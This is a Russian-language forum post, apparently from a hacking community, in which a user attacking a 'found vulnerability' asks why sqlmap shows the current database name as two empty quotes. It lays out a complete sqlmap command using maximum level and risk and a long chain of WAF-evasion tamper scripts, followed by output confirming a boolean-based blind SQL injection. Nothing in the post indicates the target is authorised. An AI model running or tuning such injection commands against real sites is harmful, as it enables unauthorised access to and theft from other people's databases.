N
network-computer
Добрый день. Пытаюсь расковырять найденную уязвимость. Запускаю sqlmap, передаю нужный урл, тамперы, левелы и риски, как обычно, но почему, то в списке перечисленных баз данных у меня выдает базу данных как '' - тоесть две кавычки и больше ничего.
Исходная команда:
Вот результат sqlmap
Почему такой вывод?
Исходная команда:
sqlmap -u "http://address?query=1" --dbms=MySQL --current-db --random-agent --thread=5 --level=5 --risk=3 --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Вот результат sqlmap
Bash:
Parameter: query (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: query=1') AND 4586=4586#
---
[17:29:06] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:29:06] [INFO] testing MySQL
[17:29:07] [WARNING] currently only couple of keywords are being processed ('UNION', 'SELECT', 'INSERT', 'UPDATE', 'FROM', 'WHERE'). You can set it manually according to your needs
[17:29:07] [INFO] confirming MySQL
[17:29:07] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.30
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[17:29:07] [INFO] fetching current database
[17:29:07] [INFO] retrieving the length of query output
[17:29:07] [INFO] retrieved:
[17:29:07] [INFO] heuristics detected web page charset 'ascii'
[17:29:07] [INFO] resumed: \x7f
current database: ''
Почему такой вывод?